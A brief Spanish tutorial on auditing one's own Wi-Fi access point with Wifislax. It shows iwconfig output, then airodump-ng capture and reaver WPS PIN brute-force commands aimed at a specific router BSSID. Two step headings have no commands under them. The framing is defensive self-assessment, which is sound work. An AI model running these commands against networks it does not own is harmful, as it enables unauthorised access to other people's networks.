Primero de todo vamos a ponernos en contexto:
- Tenemos un punto de acceso a internet wifi(router) y deseamos conocer cuan vulnerable es ante intrusiones no deseadas, para lo cual vamos a valernos de wifislax, una distribución linux orientada a la seguridad.
- Ver tarjetas de red:
iwconfig
vmnet8 no wireless extensions.
eth0 no wireless extensions.
eth1 IEEE 802.11abg ESSID:"tuwifi"
Mode:Managed Frequency:2.427 GHz Access Point: 74:EA:3A:C6:36:6C
Retry long limit:7 RTS thr:off Fragment thr:off
Power Management:off
lo no wireless extensions.
vmnet1 no wireless extensions.
-Poner en modo "promiscuo" la interfaz wifi:
-Detectar redes a nuestro alcance:
-Capturar paquetes NUESTRA wifi:
airodump-ng mon0 -w wps-test --beacons --channel 4 --bssid 74:EA:3A:C6:36:6C
-Auditar nuestro punto acceso:
reaver -i mon0 -b 74:EA:3A:C6:36:6C -vv